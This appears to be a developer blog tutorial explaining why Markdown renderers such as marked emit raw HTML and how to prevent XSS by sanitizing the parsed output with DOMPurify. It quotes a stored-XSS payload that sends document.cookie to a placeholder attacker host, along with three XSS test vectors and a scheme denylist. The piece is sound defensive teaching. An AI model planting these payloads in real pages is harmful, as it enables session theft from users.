Markdown Is Not Safe HTML: The Sanitization Step Everyone Skips
The Comment That Almost Shipped a Payload
A few years back I built a lightweight "developer notes" feature into an internal CMS: a textarea where teammates could leave Markdown-formatted comments on deploy logs. Markdown felt safe. It's just text with a little formatting, right? You type asterisks, you get bold. You type a link, you get a link. Nothing dangerous about that.
Then during code review a colleague pasted a comment to test formatting. It read, innocently enough, Looks good — see <img src=x onerror="fetch('https://evil.example/?c='+document.cookie)">. When the preview pane rendered it, his browser fired a network request carrying his session cookie to a domain none of us owned. He'd typed it as a joke to prove a point. It worked on the first try. We had a stored-XSS hole sitting in a tool that every engineer with production access used daily, and it had been live for three weeks.
What stung was that I thought I'd been careful. I was using a popular Markdown parser, the rendered output went straight into innerHTML, and at no point did I imagine the library was handing live HTML to the browser. That assumption — that a Markdown library sanitizes for you — is the single most common reason this bug exists in the wild. So let me walk through exactly why it happens, three ways an attacker exploits it, and the one-line fix that actually closes it (plus the order detail that breaks naive attempts).
Why CommonMark Hands You Live HTML On Purpose
Here is the part that surprises people: this is not a parser bug. It is the specification working as designed.
The CommonMark spec explicitly defines "raw HTML" as a valid inline and block construct. Section 6.6 ("Raw HTML") and section 4.6 ("HTML blocks") state that text matching the HTML tag grammar is passed through to the output unchanged. The spec's reasoning is sound for its purpose: Markdown was born as a way to write HTML documents comfortably, so letting authors drop in raw <table> or <iframe> when Markdown's syntax falls short is a feature. The spec makes no attempt at sanitization, which leaves that job with the caller, not the parser.
That means a spec-compliant implementation is expected to pass raw HTML through. marked and the reference commonmark.js do exactly that by default, for inline as well as block-level HTML. markdown-it is the notable exception: it ships with raw HTML disabled (html: false) and you have to opt in. None of them is "vulnerable"; they are doing what the spec describes. The vulnerability is introduced the moment you take parser output that contains raw HTML and assign it to innerHTML without a sanitization pass in between.
If you want to see this happen without trusting my word, paste an attack string into the Markdown to HTML converter and look at the raw HTML output. The processing runs entirely in your browser, so it is safe to experiment with payloads there.
Three Vectors That Walk Straight Through
Let me make the threat concrete with the three inputs I now test against every Markdown-rendering surface I build.
```javascript
import { marked } from 'marked';

// Vector 1: a raw <script> block
marked.parse('<script>alert(document.domain)</script>');
// → "<script>alert(document.domain)</script>\n"

// Vector 2: an event handler on an image that loads from a broken src
marked.parse('Hello <img src=x onerror=alert(1)>');
// → "<p>Hello <img src=x onerror=alert(1)></p>\n"

// Vector 3: a javascript: URI hidden inside ordinary link syntax
marked.parse('[click me](javascript:alert(document.cookie))');
// → '<p><a href="javascript:alert(document.cookie)">click me</a></p>\n'
```
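All three come out of the parser as live HTML. One caveat for the innerHTML case: browsers do not execute <script> elements inserted through innerHTML, so Vector 1 bites when the output is rendered server-side or written into the page some other way, while Vectors 2 and 3 work through innerHTML as-is (Vector 3 once the link is clicked). Vector 2 is the nastiest in practice because it does not look like an attack to a human reviewer: onerror fires precisely because src=x fails to load, so the image never even has to be valid. Vector 3 is sneaky for a different reason: in the Markdown source, [click me](javascript:...) is just bracket-and-paren text. It is not an href and carries no danger until the parser turns it into an <a> tag. Hold onto that fact, because it dictates the correct fix.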
A note on defaults, because they vary and the difference matters: markdown-it ships with html: false, so it escapes raw HTML blocks out of the box, and it additionally runs a validateLink check that rejects dangerous URI schemes. marked does neither — it emits raw HTML and has no built-in scheme blocking whatsoever. If your stack is marked, you own the entire sanitization burden yourself.
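To make "scheme blocking" concrete, here is a minimal sketch of the kind of check a link validator performs. The helper name isLikelySafeHref and the denylist are my own assumptions for illustration; this is not markdown-it's actual implementation, and it is not a substitute for sanitizing the final HTML.

```javascript
// Illustrative only: a denylist-style scheme check.
// isLikelySafeHref is a hypothetical helper, not part of marked or markdown-it.
const BLOCKED_SCHEMES = /^(javascript|vbscript|file|data):/;

function isLikelySafeHref(href) {
  // Strip whitespace and control characters, then lowercase, so that
  // variants like " JaVaScRiPt:" or "java\tscript:" are still recognized.
  const normalized = String(href).replace(/[\u0000-\u0020]/g, '').toLowerCase();
  return !BLOCKED_SCHEMES.test(normalized);
}

console.log(isLikelySafeHref('javascript:alert(1)'));    // false
console.log(isLikelySafeHref('https://example.com/'));   // true
```

Even a small check like this has to think about casing and stray whitespace, which is a hint at why the full job belongs to a dedicated sanitizer.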
The Fix, And Why The Order Is Not Optional
The correct, battle-tested fix is to run the parser's HTML output through DOMPurify before it ever touches the DOM:
```javascript
import { marked } from 'marked';
import DOMPurify from 'dompurify';

function renderMarkdown(input) {
  const dirtyHtml = marked.parse(input);            // step 1: Markdown → HTML
  const cleanHtml = DOMPurify.sanitize(dirtyHtml);  // step 2: strip dangerous HTML
  return cleanHtml;                                 // safe for innerHTML
}

renderMarkdown('Hello <img src=x onerror=alert(1)>');
// → <p>Hello <img src="x"></p>   (marked adds the <p>; DOMPurify removes onerror)
```
Run our three vectors through that and they collapse into harmless output. DOMPurify drops the onerror attribute entirely, removes the javascript: href so the link is left as an inert <a> with no destination, and strips <script> wholesale. The onerror image becomes a plain, dead <img src="x">: the attribute that made it dangerous is simply gone.
Now the load-bearing detail: sanitize the HTML output, never the Markdown source. I have seen well-meaning code try to "clean" the raw Markdown string first — regex out <script>, blacklist the word javascript, and so on. It does not work, and Vector 3 explains why. In the source text [click me](javascript:alert(1)), there is no href and no tag for a sanitizer to recognize. The dangerous href="javascript:..." only comes into existence after marked.parse() constructs the anchor. A sanitizer pointed at the source is staring at the wrong artifact. Parse first, sanitize the resulting HTML second. The order is the whole game.
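The ordering argument can be sketched with two toy functions. Both toyParse and toySanitize are hypothetical stand-ins I made up so the example runs without dependencies; they are nowhere near a real Markdown parser or a real sanitizer, and only mimic the one behavior each step needs here.

```javascript
// Toy "parser": turns [text](url) into an anchor, as a Markdown library would.
function toyParse(markdown) {
  return markdown.replace(/\[([^\]]*)\]\(([^\s]+)\)/g, '<a href="$2">$1</a>');
}

// Toy "sanitizer": removes href attributes that use the javascript: scheme.
// It can only act on HTML, because that is where href attributes exist.
function toySanitize(html) {
  return html.replace(/\shref="\s*javascript:[^"]*"/gi, '');
}

const source = '[click me](javascript:alert(1))';

// Wrong order: the sanitizer sees plain Markdown text and finds nothing to remove.
const wrongOrder = toyParse(toySanitize(source));
console.log(wrongOrder); // <a href="javascript:alert(1)">click me</a>

// Right order: the href exists by the time the sanitizer runs.
const rightOrder = toySanitize(toyParse(source));
console.log(rightOrder); // <a>click me</a>
```

The same two functions, composed in opposite orders, give one live payload and one inert link.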
DOMPurify earns its trust here because it does not pattern-match strings; it parses the HTML into a real DOM tree and walks it node by node, removing elements and attributes that are not on its allowlist. That structural approach is why it survives the obfuscation tricks — mixed-case <ScRiPt>, null bytes, malformed nesting — that defeat every regex-based attempt.
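As a rough mental model of that tree walk, here is a conceptual sketch over plain objects. This is not DOMPurify's code: the node shape ({ tag, attrs, children }), the tiny allowlists, and the sanitizeTree name are all assumptions of mine, and the sketch skips things a real sanitizer must handle, such as URL scheme checks.

```javascript
// Conceptual sketch only: nodes are plain objects, not real DOM nodes.
const ALLOWED_TAGS = new Set(['p', 'a', 'img', 'em', 'strong']);
const ALLOWED_ATTRS = new Set(['href', 'src', 'alt', 'title']);

function sanitizeTree(node) {
  // Text nodes are represented as strings and pass through untouched.
  if (typeof node === 'string') return node;

  // Elements not on the allowlist are dropped along with their children.
  // Comparing lowercase names is what makes <ScRiPt> a non-issue.
  if (!ALLOWED_TAGS.has(node.tag.toLowerCase())) return null;

  // Keep only allowlisted attributes; onerror and friends never match.
  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs ?? {})) {
    if (ALLOWED_ATTRS.has(name.toLowerCase())) attrs[name] = value;
  }

  // Recurse into children and discard the ones that were dropped.
  const children = (node.children ?? [])
    .map(sanitizeTree)
    .filter((child) => child !== null);

  return { tag: node.tag, attrs, children };
}
```

Because the decision is made per node and per attribute after parsing, there is no string for an attacker to obfuscate: a tag is either on the list or it is gone.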
The marked v8 Gotcha That Breaks Old Tutorials
If you are reading a Stack Overflow answer or a blog post from a few years ago, you will very likely see the advice marked.parse(input, { sanitize: true }) or a custom sanitizer callback. Stop — that code no longer runs as documented.
marked removed the sanitize and sanitizer options in version 8.0.0. They had been deprecated for a while precisely because a Markdown library reinventing an HTML sanitizer is a bad idea — that is a specialized, adversarial problem best left to a dedicated tool like DOMPurify. On a current marked, passing { sanitize: true } is silently ignored. The option does nothing. Code that relied on it isn't throwing an error to warn you; it is just quietly emitting unsanitized HTML while the developer believes the flag is protecting them. That false sense of security is arguably worse than no flag at all.
So the modern, correct mental model is a clean separation of concerns:
```javascript
// WRONG: option removed in marked v8.0.0, silently does nothing:
const unsafeHtml = marked.parse(userInput, { sanitize: true });

// RIGHT: let marked do Markdown, let DOMPurify do security:
const safeHtml = DOMPurify.sanitize(marked.parse(userInput));
```
One library converts Markdown to HTML. A different, purpose-built library makes that HTML safe. Do not ask either one to do the other's job.
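If you maintain a wrapper around the parser, one way to turn that silent failure into a loud one is a small guard on the options object. This is a sketch under my own assumptions: assertNoRemovedOptions is a hypothetical helper, not something marked provides, and it only knows about the two option names discussed above.

```javascript
// Hypothetical guard: fail loudly if a caller still passes options that
// marked removed in v8.0.0, instead of letting them be ignored.
const REMOVED_OPTIONS = ['sanitize', 'sanitizer'];

function assertNoRemovedOptions(options = {}) {
  const stale = REMOVED_OPTIONS.filter((name) => name in options);
  if (stale.length > 0) {
    throw new Error(
      `Removed marked option(s): ${stale.join(', ')}. Sanitize the HTML output instead.`
    );
  }
  return options;
}
```

Calling it on the options just before they reach the parser means a copy-pasted { sanitize: true } fails in development rather than shipping unnoticed.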
What I Changed After The Near-Miss
After that CMS incident, three rules went into my checklist permanently, and they have held up across every project since.
First, I treat any path from user input to innerHTML as hostile by default, regardless of how "trusted" the input source feels. Internal tools used only by colleagues are not safer — they are higher-value, because those sessions hold production credentials, exactly as my colleague's cookie demonstrated.
Second, I keep those three attack strings — the raw <script>, the onerror image, and the javascript: link — as a literal test fixture. If a rendering surface passes all three through unchanged, it ships unsanitized HTML, full stop. It is a ten-second check that I run by hand in the Markdown to HTML tool before wiring anything into a real DOM, and it has caught a regression more than once when someone refactored the render pipeline and dropped the sanitize call.
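That fixture can also live in code as a smoke check. The sketch below assumes your pipeline exposes some render(markdown) function that returns an HTML string; that function, the XSS_FIXTURES name, and failingFixtures are all hypothetical. The regular expressions only detect these three known payloads in the output. They are a tripwire for regressions, not a sanitizer.

```javascript
// The three fixtures from this article, each paired with a pattern that
// should NOT appear in the rendered output of a safe pipeline.
const XSS_FIXTURES = [
  {
    name: 'raw script',
    input: '<script>alert(document.domain)</script>',
    mustNotMatch: /<script/i,
  },
  {
    name: 'onerror image',
    input: 'Hello <img src=x onerror=alert(1)>',
    mustNotMatch: /<img[^>]*\sonerror\s*=/i,
  },
  {
    name: 'javascript: link',
    input: '[click me](javascript:alert(document.cookie))',
    mustNotMatch: /href\s*=\s*["']?\s*javascript:/i,
  },
];

// Returns the names of fixtures whose payload survived rendering.
// An empty array means none of the three known payloads got through.
function failingFixtures(render) {
  return XSS_FIXTURES
    .filter(({ input, mustNotMatch }) => mustNotMatch.test(render(input)))
    .map(({ name }) => name);
}
```

Wired into a unit test as "failingFixtures(renderMarkdown) must be empty", it catches the case where a refactor drops the sanitize call.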
Third — and this is the subtle one — I verify the order in the actual code, not just the presence of a sanitizer. DOMPurify.sanitize(marked.parse(x)) is safe; marked.parse(DOMPurify.sanitize(x)) is not, because sanitizing the Markdown source leaves the javascript: link untouched to be parsed into a live href afterward. The two lines look almost identical in a diff. Only one of them is correct.
Markdown feels safe because, as a syntax, it is small and friendly. But the CommonMark spec was never trying to protect you. It was trying to faithfully produce HTML, and it does that job perfectly, dangerous tags and all. Safety is a second, separate step that lives entirely on your side of the line. Skip it and you are not running a Markdown renderer; you are running an open HTML injection endpoint with nicer syntax. The same principle applies anywhere you handle untrusted structured input: it is why processing things like JSON locally in your browser, and treating every external string as adversarial, are the only sane defaults.
Tools used in this guide
- Markdown to HTML Converter — Paste Markdown, preview the rendered result, and copy sanitized HTML for docs, CMS publishing, or prototypes.
- JSON Formatter — Paste JSON, validate it, format it with indentation, or minify it into compact output for APIs and config files.